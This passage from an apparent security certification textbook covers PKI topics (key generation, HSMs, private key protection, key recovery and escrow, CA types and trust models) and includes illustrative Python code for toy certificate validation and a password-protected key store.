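Names, serials, dates and CRL contents are constructed for the example.
"""
import hashlib
import json

E = 65537   # public exponent


def toy_keypair(p: int, q: int):
    n, phi = p * q, (p - 1) * (q - 1)
    return {"n": n, "e": E}, {"n": n, "d": pow(E, -1, phi)}


def digest_int(data: bytes) -> int:
    return int.from_bytes(hashlib.sha256(data).digest(), "big")


def toy_sign(priv: dict, data: bytes) -> int:
    return pow(digest_int(data), priv["d"], priv["n"])        # digest "encrypted" with the private key


def toy_verify(pub: dict, data: bytes, sig: int) -> bool:
    return pow(sig, pub["e"], pub["n"]) == digest_int(data)   # recover Y, compare with freshly computed X


def tbs_bytes(tbs: dict) -> bytes:
    """Canonical encoding of the to-be-signed fields (a stand-in for DER)."""
    return json.dumps(tbs, sort_keys=True).encode()


def issue_certificate(issuer: str, issuer_priv: dict, subject: str, subject_pub: dict,
                      serial: int, not_before: str, not_after: str) -> dict:
    tbs = {"version": 3, "serial": serial, "issuer": issuer, "subject": subject,
           "notBefore": not_before, "notAfter": not_after, "publicKey": subject_pub}
    return {"tbs": tbs, "signature": toy_sign(issuer_priv, tbs_bytes(tbs))}


def validate_certificate(cert: dict, trust_store: dict, crl_serials: set, now: str) -> str:
    """Steps 1-4, 6 and 7 of the Tech Tip; returns 'valid' or the first failure found."""
    tbs = cert["tbs"]
    ca_pub = trust_store.get(tbs["issuer"])                         # 1: issuer must be on our CA list
    if ca_pub is None:
        return "untrusted issuer"
    if not toy_verify(ca_pub, tbs_bytes(tbs), cert["signature"]):   # 2-4: digest vs. recovered digest
        return "certificate signature invalid"
    if not (tbs["notBefore"] <= now <= tbs["notAfter"]):            # 6: ISO-8601 strings sort in time order
        return "outside validity period"
    if tbs["serial"] in crl_serials:                                # 7: revocation check against the CRL
        return "revoked"
    return "valid"


def verify_signed_message(message: bytes, signature: int, cert: dict, expected_subject: str,
                          trust_store: dict, crl_serials: set, now: str) -> str:
    status = validate_certificate(cert, trust_store, crl_serials, now)
    if status != "valid":
        return f"reject: {status}"
    if cert["tbs"]["subject"] != expected_subject:                  # 5: the certificate must name the sender
        return "reject: certificate names someone else"
    if not toy_verify(cert["tbs"]["publicKey"], message, signature):
        return "reject: message signature does not verify"
    return "accept"


# Constructed actors. Mersenne primes are convenient for a demo and hopeless for real keys.
CA_PUB, CA_PRIV = toy_keypair(2**521 - 1, 2**127 - 1)
JOYCE_PUB, JOYCE_PRIV = toy_keypair(2**607 - 1, 2**107 - 1)
IMPOSTOR_PUB, IMPOSTOR_PRIV = toy_keypair(2**1279 - 1, 2**89 - 1)

TRUST_STORE = {"CN=Example Root CA": CA_PUB}                       # Maynard's configured CA list
JOYCE_CERT = issue_certificate("CN=Example Root CA", CA_PRIV, "CN=Joyce", JOYCE_PUB,
                               0x2001, "2016-01-01T00:00:00Z", "2017-01-01T00:00:00Z")
# The impostor can mint a certificate that says "Joyce", but only from a CA nobody trusts...
IMPOSTOR_CERT = issue_certificate("CN=Rogue CA", IMPOSTOR_PRIV, "CN=Joyce", IMPOSTOR_PUB,
                                  0x1, "2016-01-01T00:00:00Z", "2017-01-01T00:00:00Z")
# ...or swap his key into Joyce's real certificate, which breaks the CA's signature over it.
ALTERED_CERT = {"tbs": dict(JOYCE_CERT["tbs"], publicKey=IMPOSTOR_PUB),
                "signature": JOYCE_CERT["signature"]}


def run_scenarios() -> dict:
    now, message = "2016-06-01T00:00:00Z", b"Hi. How are you?"
    joyce_sig, impostor_sig = toy_sign(JOYCE_PRIV, message), toy_sign(IMPOSTOR_PRIV, message)
    who = ("CN=Joyce", TRUST_STORE)
    return {
        "genuine": verify_signed_message(message, joyce_sig, JOYCE_CERT, *who, set(), now),
        "tampered message": verify_signed_message(b"Hi. Wire $5000.", joyce_sig, JOYCE_CERT, *who, set(), now),
        "revoked": verify_signed_message(message, joyce_sig, JOYCE_CERT, *who, {0x2001}, now),
        "expired": verify_signed_message(message, joyce_sig, JOYCE_CERT, *who, set(), "2018-01-01T00:00:00Z"),
        "untrusted issuer": verify_signed_message(message, impostor_sig, IMPOSTOR_CERT, *who, set(), now),
        "altered certificate": verify_signed_message(message, impostor_sig, ALTERED_CERT, *who, set(), now),
    }


if __name__ == "__main__":
    for name, verdict in run_scenarios().items():
        print(f"{name:20s} -> {verdict}")
```

The order of the checks matters: the issuer lookup and signature check come first because nothing inside an unverified certificate (dates, serial, subject, key) can be believed until the CA's signature over it has been confirmed, and the message signature is checked last because it is only meaningful once the public key has been tied to Joyce.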
Centralized and Decentralized Infrastructures
Keys used for authentication and encryption within a PKI environment can be generated in a centralized or decentralized manner. In a decentralized approach, software on individual computers generates and stores cryptographic keys local to the systems themselves. In a centralized infrastructure, the keys are generated and stored on a central server, and the keys are transmitted to the individual systems as needed. You might choose one type over the other for several reasons. If a company uses an asymmetric algorithm that is resource-intensive to generate the public/private key pair, and if large (and resource-intensive) key sizes are needed, then the individual computers may not have the necessary processing power to produce the keys in an acceptable fashion. In this situation, the company can choose a centralized approach in which a very high-end server with powerful processing abilities is used, probably along with a hardware-based random number generator.
Central key generation and storage offers other benefits as well. For example, it is much easier to back up the keys and implement key recovery procedures with central storage than with a decentralized approach. Implementing a key recovery procedure on each and every computer holding one or more key pairs is difficult, and many applications that generate their own key pairs do not usually interface well with a centralized archive system. This means that if a company chooses to allow its individual users to create and maintain their own key pairs on their separate workstations, no real key recovery procedure can be put in place. This puts the company at risk. If an employee leaves the organization or is unavailable for one reason or another, the company may not be able to access its own business information that was encrypted by that employee.
So a centralized approach seems like the best approach, right? Well, the centralized method has some drawbacks to consider, too. Secure key distribution is a tricky event. This can be more difficult than it sounds. A technology needs to be employed that will send the keys in an encrypted manner, ensure the keys’ integrity, and make sure that only the intended user is receiving the key. Also, the server that centrally stores the keys needs to be highly available and is a potential single point of failure, so some type of fault tolerance or redundancy mechanism may need to be put into place. If that one server goes down, users could not access their keys, which might prevent them from properly authenticating to the network, resources, and applications. Also, since all the keys are in one place, the server is a prime target for an attacker—if the central key server is compromised, the whole environment is compromised.
One other issue pertains to how the keys will actually be used. If a public/private key pair is being generated for digital signatures, and if the company wants to ensure that it can be used to provide true authenticity and nonrepudiation, the keys should not be generated at a centralized server. This would introduce doubt that only the one person had access to a specific private key. It is better to generate end-user keys on a local machine to eliminate doubt about who did the work and “owns” the keys.
If a company uses smart cards to hold users’ private keys, each private key often has to be generated on the card itself and cannot be copied for archiving purposes. This is a disadvantage of the centralized approach. In addition, some types of applications have been developed to create their own public/private key pairs and do not allow other keys to be imported and used. This means the keys would have to be created locally by these applications, and keys from a central server could not be used. These are just some of the considerations that need to be evaluated before any decision is made and implementation begins.
Hardware Security Modules
PKIs can be constructed in software without special cryptographic hardware, and this is perfectly suitable for many environments. But software can be vulnerable to viruses, hackers, and hacking. If a company requires a higher level of protection than a purely software-based solution can provide, several hardware-based solutions are available. A hardware security module (HSM) is a physical device that safeguards cryptographic keys. HSMs enable a higher level of security for the use of keys, including generation and authentication. In most situations, HSM solutions are used only for the most critical and sensitive keys, which are the root key and possibly the intermediate CA private keys. If those keys are compromised, the whole security of the PKI is gravely threatened. If a person obtained a root CA private key, she could digitally sign any certificate, and that certificate would be quickly accepted by all entities within the environment. Such an attacker might be able to create a certificate that has extremely high privileges, perhaps allowing her to modify bank account information in a financial institution, and no alerts or warnings would be initiated because the ultimate CA, the root CA, signed it.
Tech Tip
Storing Critical Keys
HSMs take many different forms, including embedded cards, network-attached devices, and even USB flash drives. HSMs assist in the use of cryptographic keys across the lifecycle. They can provide dedicated support for centralized lifecycle management, from generation to distribution, storage, termination, archiving, and record keeping. HSMs can increase the efficiency of cryptographic operations and assist in compliance efforts. Common uses include use in PCI DSS solutions, DNSSEC, signing operations including certificates, code, documents, and e-mail, and large-scale data encryption efforts.
Private Key Protection
Although a PKI implementation can be complex, with many different components and options, a critical concept common to all PKIs must be understood and enforced: the private key needs to stay private. A digital signature is created solely for the purpose of proving who sent a particular message by using a private key. This rests on the assumption that only one person has access to this private key. If an imposter obtains a user’s private key, authenticity and nonrepudiation can no longer be claimed or proven.
When a private key is generated for the first time, it must be stored somewhere for future use. This storage area is referred to as a key store, and it is usually created by the application registering for a certificate, such as a web browser, smart card software, or other application. In most implementations, the application will prompt the user for a password, which will be used to create an encryption key that protects the key store. So, for example, if Cheryl used her web browser to register for a certificate, her private key would be generated and stored in the key store. Cheryl would then be prompted for a password, which the software would use to create a key that will encrypt the key store. When Cheryl needs to access this private key later that day, she will be prompted for the same password, which will decrypt the key store and allow her access to her private key.
Unfortunately, many applications do not require that a strong password be created to protect the key store, and in some implementations the user can choose not to provide a password at all. The user still has a private key available, and it is bound to the user’s identity, so why is a password even necessary? If, for example, Cheryl decided not to use a password, and another person sat down at her computer, he could use her web browser and her private key and digitally sign a message that contains a nasty virus. If Cheryl’s coworker Cliff received this message, he would think it came from Cheryl, open the message, and download the virus. The moral to this story is that users should be required to provide some type of authentication information (password, smart card, PIN, or the like) before being able to use private keys. Otherwise, the keys could be used by other individuals or imposters, and authentication and nonrepudiation would be of no use.
Because a private key is a crucial component of any PKI implementation, the key itself should contain the necessary characteristics and be protected at each stage of its life. The following list sums up the characteristics and requirements of proper private key use:
The security associated with the use of public key cryptography revolves around the security of the private key. Nonrepudiation depends upon the principle that the private key is only accessible to the holder of the key. If another person has access to the private key, they can impersonate the proper key holder.
The key size should provide the necessary level of protection for the environment.
The lifetime of the key should correspond with how often it is used and the sensitivity of the data it is protecting.
The key should be changed at the end of its lifetime and not used past its allowed lifetime.
Where appropriate, the key should be properly destroyed at the end of its lifetime.
The key should never be exposed in clear text.
No copies of the private key should be made if it is being used for digital signatures.
The key should not be shared.
The key should be stored securely.
Authentication should be required before the key can be used.
The key should be transported securely.
Software implementations that store and use the key should be evaluated to ensure they provide the necessary level of protection.
If digital signatures will be used for legal purposes, these points and others may need to be audited to ensure that true authenticity and nonrepudiation are provided.
The most sensitive and critical public/private key pairs are those used by CAs to digitally sign certificates. These need to be highly protected because if they were ever compromised, the trust relationship between the CA and all of the end-entities would be threatened. In high-security environments, these keys are often kept in a tamper-proof hardware encryption store, such as an HSM, and are accessible only to individuals with a need to know.
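The password-protected key store described for Cheryl above can be shown in code. The following is an added example written for this section, not code from the book or from any particular browser or smart card product: the password is stretched with PBKDF2 into an encryption key and a separate integrity key, the private key is encrypted under the first and authenticated under the second, and opening the store with the wrong password (or no password at all) fails instead of handing the private key out. The counter-mode keystream built from HMAC-SHA256 is a stand-in constructed here so the example runs on the standard library alone; a real key store would use a vetted authenticated cipher such as AES-GCM. The private key bytes and passwords are constructed sample values.

```python
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 100_000   # slows offline password guessing against a stolen key store file
MIN_PASSWORD_LEN = 12         # policy: refuse an empty or trivially short password


class KeyStoreError(Exception):
    """Raised when a key store cannot be sealed or opened."""


def _derive_keys(password: str, salt: bytes):
    """Stretch the user's password into an encryption key and a distinct integrity (MAC) key."""
    material = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                                   PBKDF2_ITERATIONS, dklen=64)
    return material[:32], material[32:]


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Constructed stand-in for a stream cipher: HMAC-SHA256 over (nonce || counter) blocks."""
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def seal_key_store(private_key: bytes, password: str) -> dict:
    """Encrypt and authenticate a private key under a key derived from the user's password."""
    if len(password) < MIN_PASSWORD_LEN:
        raise KeyStoreError("a key store must be protected by a password of at least "
                            f"{MIN_PASSWORD_LEN} characters")
    salt, nonce = os.urandom(16), os.urandom(16)
    enc_key, mac_key = _derive_keys(password, salt)
    ciphertext = bytes(a ^ b for a, b in
                       zip(private_key, _keystream(enc_key, nonce, len(private_key))))
    # The tag covers everything a thief could tamper with in the stored file.
    tag = hmac.new(mac_key, salt + nonce + ciphertext, hashlib.sha256).digest()
    return {"salt": salt, "nonce": nonce, "ciphertext": ciphertext, "tag": tag}


def open_key_store(store: dict, password: str) -> bytes:
    """Return the private key only if the password re-derives keys that authenticate the store."""
    enc_key, mac_key = _derive_keys(password, store["salt"])
    expected = hmac.new(mac_key, store["salt"] + store["nonce"] + store["ciphertext"],
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, store["tag"]):   # constant-time comparison
        raise KeyStoreError("authentication failed: wrong password or tampered key store")
    stream = _keystream(enc_key, store["nonce"], len(store["ciphertext"]))
    return bytes(a ^ b for a, b in zip(store["ciphertext"], stream))


if __name__ == "__main__":
    # Constructed sample values: not a real key, not a real user's password.
    cheryls_key = b"-----CONSTRUCTED SAMPLE PRIVATE KEY BYTES-----"
    store = seal_key_store(cheryls_key, "correct horse battery staple")
    print("opened with right password:", open_key_store(store, "correct horse battery staple") == cheryls_key)
    try:
        open_key_store(store, "someone else at her desk")
    except KeyStoreError as err:
        print("wrong password:", err)
```

Note that the encrypted key store on disk reveals nothing usable to whoever sits down at the computer next; what the text calls "authentication before the key can be used" is the password check performed by `open_key_store`, and `seal_key_store` refusing a short or empty password is the policy control the text says many applications lack.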
Key Recovery
One individual could have one, two, or many key pairs that are tied to his or her identity. That is because users may have different needs and requirements for public/private key pairs. As mentioned earlier, certificates can have specific attributes and usage requirements dictating how their corresponding keys can and cannot be used. For example, David can have one key pair he uses to encrypt and transmit symmetric keys, another key pair that allows him to encrypt data, and yet another key pair to perform digital signatures. David can also have a digital signature key pair for his work-related activities and another key pair for personal activities, such as e-mailing his friends. These key pairs need to be used only for their intended purposes, and this is enforced through certificate attributes and usage values.
If a company is going to perform key recovery and maintain a key recovery system, it will generally back up only the key pair used to encrypt data, not the key pairs that are used to generate digital signatures. The reason that a company archives keys is to ensure that if a person leaves the company, falls off a cliff, or for some reason is unavailable to decrypt important company information, the company can still get to its company-owned data. This is just a matter of the organization protecting itself. A company would not need to be able to recover a key pair that is used for digital signatures, since those keys are to be used only to prove the authenticity of the individual who sent a message. A company would not benefit from having access to those keys and really should not have access to them, since they are tied to one individual for a specific purpose.
Two systems are important for backing up and restoring cryptographic keys: key archiving and key recovery. Key archiving is a way of backing up keys and securely storing them in a repository; key recovery is the process of restoring lost keys to the users or the company.
Exam Tip: Key archiving is the process of storing a set of keys to be used as a backup should something happen to the original set. Key recovery is the process of using the backup keys.
If keys are backed up and stored in a centralized computer, this system must be tightly controlled, because if it were compromised, an attacker would have access to all keys for the entire infrastructure. Also, it is usually unwise to authorize a single person to be able to recover all the keys within the environment, because that person could use this power for evil purposes instead of just recovering keys when they are needed for legitimate purposes. In security systems, it is best not to fully trust anyone.
Dual control can be used as part of a system to back up and archive data encryption keys. PKI systems can be configured to require multiple individuals to be involved in any key recovery process. When a key recovery is required, at least two people can be required to authenticate by the key recovery software before the recovery procedure is performed. This enforces separation of duties, which means that one person cannot complete a critical task by himself. Requiring two individuals to recover a lost key together is called dual control, which simply means that two people have to be present to carry out a specific task.
Tech Tip
Key Splitting
Secret splitting using m of n authentication schemes can improve security by requiring that multiple people perform critical functions, preventing a single party from compromising a secret. Be sure to understand the concept of m of n for the CompTIA Security+ exam.
This approach to key recovery is referred to as the m of n authentication, where n number of people can be involved in the key recovery process, but at least m (which is a smaller number than n) must be involved before the task can be completed. The goal is to minimize fraudulent or improper use of access and permissions. A company would not require all possible individuals to be involved in the recovery process, because getting all the people together at the same time could be impossible considering meetings, vacations, sick time, and travel. At least some of all possible individuals must be available to participate, and this is the subset m of the number n. This form of secret splitting can increase security by requiring multiple people to perform a specific function. Requiring too many people for the m subset increases issues associated with availability, whereas requiring too few increases the risk of a small number of people colluding to compromise a secret.
Exam Tip: Recovery agent is the term for an entity that is given a public key certificate for recovering user data that is encrypted. This is the most common type of recovery policy used in PKI but adds the risk of the recovery agent having access to secured information.
All key recovery procedures should be highly audited. The audit logs should capture at least what keys were recovered, who was involved in the process, and the time and date. Keys are an integral piece of any encryption cryptosystem and are critical to a PKI environment, so you need to track who does what with them.
Key Escrow
Key recovery and key escrow are terms that are often used interchangeably, but they actually describe two different things. You should not use them interchangeably after you have read this section.
Exam Tip: Key recovery is a process that allows for lost keys to be recovered. Key escrow is a process of giving keys to a third party so that they can decrypt and read sensitive information when this need arises.
Key escrow is the process of giving keys to a third party so that they can decrypt and read sensitive information if the need arises. Key escrow almost always pertains to handing over encryption keys to the government, or to another higher authority, so that the keys can be used to collect evidence during investigations. A key pair used in a person’s place of work may be required to be escrowed by the employer for two reasons. First, the keys are property of the enterprise, issued to the worker for use. Second, the firm may have need for them after an employee leaves the firm.
Exam Tip: Key escrow, allowing another trusted party to hold a copy of a key, has long been a controversial topic. This essential business process provides continuity should the authorized key-holding party leave an organization without disclosing keys. The security of the escrowed key is a concern, and it needs to be managed at the same security level as for the original key.
Several movements, supported by parts of the U.S. government, would require all or many people residing in the United States to hand over copies of the keys they use to encrypt communication channels. The movement in the late 1990s behind the Clipper chip is the most well-known effort to implement this requirement and procedure. It was suggested that all American-made communication devices should have a hardware encryption chip within them. The chip could be used to encrypt data going back and forth between two individuals, but if a government agency decided that it should be able to eavesdrop on this dialog, it would just need to obtain a court order. If the court order was approved, a law enforcement agent would take the order to two escrow agencies, each of which would have a piece of the key that was necessary to decrypt this communication information. The agent would obtain both pieces of the key and combine them, which would allow the agent to listen in on the encrypted communication outlined in the court order.
The Clipper chip standard never saw the light of day because it seemed too “Big Brother” to many American citizens. But the idea was that the encryption keys would be escrowed to two agencies, meaning that each agency would hold one piece of the key. One agency could not hold the whole key, because it could then use this key to wiretap people’s conversations illegally. Splitting up the key is an example of separation of duties, put into place to try and prevent fraudulent activities. The current issue of governments demanding access to keys to decrypt information is covered in Chapter 24.
Public Certificate Authorities
An individual or company may decide to rely on a CA that is already established and being used by many other individuals and companies—a public CA. A company, on the other hand, may decide that it needs its own CA for internal use, which gives the company more control over the certificate registration and generation process and allows it to configure items specifically for its own needs. This second type of CA is referred to as a private CA (or in-house CA), discussed in the next section.
A public CA specializes in verifying individual identities and creating and maintaining their certificates. These companies issue certificates that are not bound to specific companies or intracompany departments. Instead, their services are to be used by a larger and more diversified group of people and organizations. If a company uses a public CA, the company will pay the CA organization for individual certificates and for the service of maintaining these certificates. Some examples of public CAs are VeriSign (including GeoTrust and Thawte), Entrust, and GoDaddy.
Users can remove CAs from their browser list if they want to have more control over who their system trusts and who it doesn’t. Unfortunately, system updates can restore them, requiring regular certificate store maintenance.
One advantage of using a public CA is that it is usually well known and easily accessible to many people. Most web browsers have a list of public CAs installed and configured by default, along with their corresponding root certificates. This means that if you install a web browser on your computer, it is already configured to trust certain CAs, even though you might have never heard of them before. So, if you receive a certificate from Bob, and his certificate was digitally signed by a CA listed in your browser, you automatically trust the CA and can easily walk through the process of verifying Bob’s certificate. This has raised some eyebrows among security professionals, however, since trust is installed by default, but the industry has deemed this is a necessary approach that provides users with transparency and increased functionality.
Earlier in the chapter, the different certificate classes and their uses were explained. No global standard defines these classes, the exact requirements for obtaining these different certificates, or their uses. Standards are in place, usually for a particular country or industry, but this means that public CAs can define their own certificate classifications. This is not necessarily a good thing for companies that depend on public CAs, because it does not provide to the company enough control over how it should interpret certificate classifications and how they should be used.
This means another component needs to be carefully developed for companies that use and depend on public CAs, and this component is referred to as the certificate policy (CP). This policy allows the company to decide what certification classes are acceptable and how they will be used within the organization. This is different from the CPS, which explains how the CA verifies entities, generates certificates, and maintains these certificates. The CP is generated and owned by an individual company that uses an external CA, and it allows the company to enforce its security decisions and control how certificates are used with its applications.
In-House Certificate Authorities
An in-house CA is implemented, maintained, and controlled by the company that implemented it. This type of CA can be used to create certificates for internal employees, devices, applications, partners, and customers. This approach gives the company complete control over how individuals are identified, what certification classifications are created, who can and cannot have access to the CA, and how the certifications can be used.
Tech Tip
Why In-House CAs?
In-house CAs provide more flexibility for companies, which often integrate them into current infrastructures and into applications for authentication, encryption, and nonrepudiation purposes. If the CA is going to be used over an extended period of time, this can be a cheaper method of generating and using certificates than having to purchase them through a public CA. Setting up in-house certificate servers is relatively easy and can be done with simple software that targets both Windows and Linux servers.
Choosing Between a Public CA and an In-House CA
When deciding between an in-house and public CA, various factors need to be identified and accounted for. Many companies have embarked upon implementing an in-house PKI environment with a rough estimate that would be implemented within x number of months and would cost approximately y amount in dollars. Without doing the proper homework, companies might not understand the current environment, might not completely hammer out the intended purpose of the PKI, and might not have enough skilled staff supporting the project; time estimates can double or triple and the required funds and resources can become unacceptable. Several companies have started on a PKI implementation, only to quit halfway through, resulting in wasted time and money, with nothing to show for it except heaps of frustration and many ulcers.
In some situations, it is better for a company to use a public CA, since public CAs already have the necessary equipment, skills, and technologies. In other situations, companies may decide it is a better business decision to take on these efforts themselves. This is not always a strictly monetary decision—a specific level of security might be required. Some companies do not believe that they can trust an outside authority to generate and maintain their users’ and company’s certificates. In this situation, the scale may tip toward an in-house CA.
Certificate authorities come in many types: public, in-house, and outsourced. All of them perform the same functions, with the only difference being an organizational one. This can have a bearing on trust relationships, as one is more likely to trust in-house CAs over others for which there is arguably less control.
Each company is unique, with various goals, security requirements, functionality needs, budgetary restraints, and ideologies. The decision of whether to use a public CA or an in-house CA depends on the expansiveness of the PKI within the organization, how integrated it will be with different business needs and goals, its interoperability with a company’s current technologies, the number of individuals who will be participating, and how it will work with outside entities. This could be quite a large undertaking that ties up staff, resources, and funds, so a lot of strategic planning is required, and what will and won’t be gained from a PKI should be fully understood before the first dollar is spent on the implementation.
Outsourced Certificate Authorities
The last available option for using PKI components within a company is to outsource different parts of it to a specific service provider. Usually, the more complex parts are outsourced, such as the CA, RA, CRL, and key recovery mechanisms. This occurs if a company does not have the necessary skills to implement and carry out a full PKI environment.
Tech Tip
Outsourced CA vs. Public CA
An outsourced CA is different from a public CA in that it provides dedicated services, and possibly equipment, to an individual company. A public CA, in contrast, can be used by hundreds or thousands of companies—the CA doesn’t maintain specific servers and infrastructures for individual companies.
Although outsourced services might be easier for your company to implement, you need to review several factors before making this type of commitment. You need to determine what level of trust the company is willing to give to the service provider and what level of risk it is willing to accept. Often a PKI and its components serve as large security components within a company’s enterprise, and allowing a third party to maintain the PKI can introduce too many risks and liabilities that your company is not willing to undertake. The liabilities the service provider is willing to accept, the security precautions and procedures the outsourced CAs provide, and the surrounding legal issues need to be examined before this type of agreement is made.
Some large vertical markets have their own outsourced PKI environments set up because they share similar needs and usually have the same requirements for certification types and uses. This allows several companies within the same market to split the costs of the necessary equipment, and it allows for industry-specific standards to be drawn up and followed. For example, although many medical facilities work differently and have different environments, they have a lot of the same functionality and security needs. If several of them came together, purchased the necessary equipment to provide CA, RA, and CRL functionality, employed one person to maintain it, and then each connected its different sites to the centralized components, the medical facilities could save a lot of money and resources. In this case, not every facility would need to strategically plan its own full PKI, and each would not need to purchase redundant equipment or employ redundant staff members. Figure 6.10 illustrates how one outsourced service provider can offer different PKI components and services to different companies, and how companies within one vertical market can share the same resources.
• Figure 6.10 A PKI service provider (represented by the four boxes) can offer different PKI components to companies.
A set of standards can be drawn up about how each different facility should integrate its own infrastructure and how it should integrate with the centralized PKI components. This also allows for less-complicated intercommunication to take place between the different medical facilities, which will ease information-sharing attempts.
Tying Different PKIs Together
In some cases, more than one CA may be needed for a specific PKI to work properly, and several requirements must be met for different PKIs to intercommunicate. Here are some examples:
A company wants to be able to communicate seamlessly with its suppliers, customers, or business partners via a PKI.
One department within a company has higher security requirements than all other departments and thus needs to configure and control its own CA.
One department needs to have specially constructed certificates with unique fields and usages.
Different parts of an organization want to control their own pieces of the network and the CA that is encompassed within it.
The number of certificates that need to be generated and maintained would overwhelm one CA, so multiple CAs must be deployed.
The political culture of a company inhibits one department from being able to control elements of another department.
Enterprises are partitioned geographically, and different sites need their own local CA.
These situations can add much more complexity to the overall infrastructure, intercommunication capabilities, and procedures for certificate generation and validation. To control this complexity properly from the beginning, these requirements need to be understood, addressed, and planned for. Then the necessary trust model needs to be chosen and molded for the company to build upon. Selecting the right trust model will give the company a solid foundation from the beginning, instead of trying to add structure to an inaccurate and inadequate plan later on.
Trust Models
Potential scenarios exist other than just having more than one CA—each of the companies or each department of an enterprise can actually represent a trust domain itself. A trust domain is a construct of systems, personnel, applications, protocols, technologies, and policies that work together to provide a certain level of protection. All of these components can work together seamlessly within the same trust domain because they are known to the other components within the domain and are trusted to some degree. Different trust domains are usually managed by different groups of administrators, have different security policies, and restrict outsiders from privileged access.
Tech Tip
Trust Models
There are several forms of trust models associated with certificates. Hierarchical, peer-to-peer, and hybrid are the primary forms, with the web of trust being a form of hybrid. Each of these models has a useful place in the PKI architecture under different circumstances.
Most trust domains (whether individual companies or departments) usually are not islands cut off from the world—they need to communicate with other, less-trusted domains. The trick is to figure out how much two different domains should trust each other, and how to implement and configure an infrastructure that would allow these two domains to communicate in a way that will not allow security compromises or breaches. This can be more difficult than it sounds.
In the nondigital world, it is difficult to figure out who to trust, how to carry out legitimate business functions, and how to ensure that one is not being taken advantage of or lied to. Jump into the digital world and add protocols, services, encryption, CAs, RAs, CRLs, and differing technologies and applications, and the business risks can become overwhelming and confusing. So start with a basic question: What criteria will we use to determine who we trust and to what degree?
One example of trust considered earlier in the chapter is the driver’s license issued by the DMV. Suppose, for example, that Bob is buying a lamp from Carol and he wants to pay by check. Since Carol does not know Bob, she does not know if she can trust him or have much faith in his check. But if Bob shows Carol his driver’s license, she can compare the name to what appears on the check, and she can choose to accept it. The trust anchor (the agreed-upon trusted third party) in this scenario is the DMV, since both Carol and Bob trust it more than they trust each other. Bob had to provide documentation to the DMV to prove his identity, that organization trusted him enough to generate a license, and Carol trusts the DMV, so she decides to trust Bob’s check.
Consider another example of a trust anchor. If Joe and Stacy need to communicate through e-mail and would like to use encryption and digital signatures, they will not trust each other’s certificate alone. But when each receives the other’s certificate and sees that it has been digitally signed by an entity they both do trust—the CA—they have a deeper level of trust in each other. The trust anchor here is the CA. This is easy enough, but when we need to establish trust anchors between different CAs and PKI environments, it gets a little more complicated.
If two companies need to communicate using their individual PKIs, or if two departments within the same company use different CAs, two separate trust domains are involved. The users and devices from these different trust domains need to communicate with each other, and they need to exchange certificates and public keys, which means that trust anchors need to be identified and a communication channel must be constructed and maintained.
A trust relationship must be established between two issuing authorities (CAs). This happens when one or both of the CAs issue a certificate for the other CA’s public key, as shown in Figure 6.11. This means that each CA registers for a certificate and public key from the other CA. Each CA validates the other CA’s identification information and generates a certificate containing a public key for that CA to use. This establishes a trust path between the two entities that can then be used when users need to verify other users’ certificates that fall within the different trust domains. The trust path can be unidirectional or bidirectional, so either the two CAs trust each other (bidirectional) or only one trusts the other (unidirectional).
• Figure 6.11 A trust relationship can be built between two trust domains to set up a communication channel.
Exam Tip: Three forms of trust models are commonly found in PKIs:
• Hierarchical
• Peer-to-peer
• Hybrid
As illustrated in Figure 6.11, all the users and devices in trust domain 1 trust their own CA, CA 1, which is their trust anchor. All users and devices in trust domain 2 have their own trust anchor, CA 2. The two CAs have exchanged certificates and trust each other, but they do not have a common trust anchor between them.
The trust models describe and outline the trust relationships between the different CAs and different environments, which will indicate where the trust paths reside. The trust models and paths need to be thought out before implementation to restrict and control access properly and to ensure that as few trust paths as possible are used. Several different trust models can be used: the hierarchical, peer-to-peer, and hybrid models are discussed in the following sections.
Hierarchical Trust Model
The hierarchical trust model is a basic hierarchical structure that contains a root CA, intermediate CAs, leaf CAs, and end-entities. The configuration is that of an inverted tree, as shown in Figure 6.12. The root CA is the ultimate trust anchor for all other entities in this infrastructure, and it generates certificates for the intermediate CAs, which in turn generate certificates for the leaf CAs, and the leaf CAs generate certificates for the end-entities (users, network devices, and applications).
• Figure 6.12 The hierarchical trust model outlines trust paths.
Intermediate CAs function to transfer trust between different CAs. These CAs are referred to as subordinate CAs because they are subordinate to the CA that they reference. The path of trust is walked up from the subordinate CA to the higher-level CA; in essence the subordinate CA is using the higher-level CA as a reference.
As shown in Figure 6.12, no bidirectional trusts exist—they are all unidirectional trusts, as indicated by the one-way arrows. Since no other entity can certify and generate certificates for the root CA, it creates a self-signed certificate. This means that the certificate’s Issuer and Subject fields hold the same information, both representing the root CA, and the root CA’s public key will be used to verify this certificate when that time comes. This root CA certificate and public key are distributed to all entities within this trust model.
Tech Tip
Root CA
If the root CA’s private key were ever compromised, all entities within the hierarchical trust model would be drastically affected, because this is their sole trust anchor. The root CA usually has a small amount of interaction with the intermediate CAs and end-entities, and can therefore be taken offline much of the time. This provides a greater degree of protection for the root CA, because when it is offline it is basically inaccessible.
Walking the Certificate Path
When a user in one trust domain needs to communicate with a user in another trust domain, one user will need to validate the other’s certificate. This sounds simple enough, but what it really means is that each certificate for each CA, all the way up to a shared trusted anchor, also must be validated. If Debbie needs to validate Sam’s certificate, as shown in Figure 6.12, she actually also needs to validate the Leaf D CA and Intermediate B CA certificates, as well as Sam’s.
So in Figure 6.12, we have a user, Sam, who digitally signs a message and sends it and his certificate to Debbie. Debbie needs to validate this certificate before she can trust Sam’s digital signature. Included in Sam’s certificate is an Issuer field, which indicates that the certificate was issued by Leaf D CA. Debbie has to obtain Leaf D CA’s digital certificate and public key to validate Sam’s certificate. Remember that Debbie validates the certificate by verifying its digital signature. The digital signature was created by the certificate issuer using its private key, so Debbie needs to verify the signature using the issuer’s public key.
Debbie tracks down Leaf D CA’s certificate and public key, but she now needs to verify this CA’s certificate, so she looks at the Issuer field, which indicates that Leaf D CA’s certificate was issued by Intermediate B CA. Debbie now needs to get Intermediate B CA’s certificate and public key.
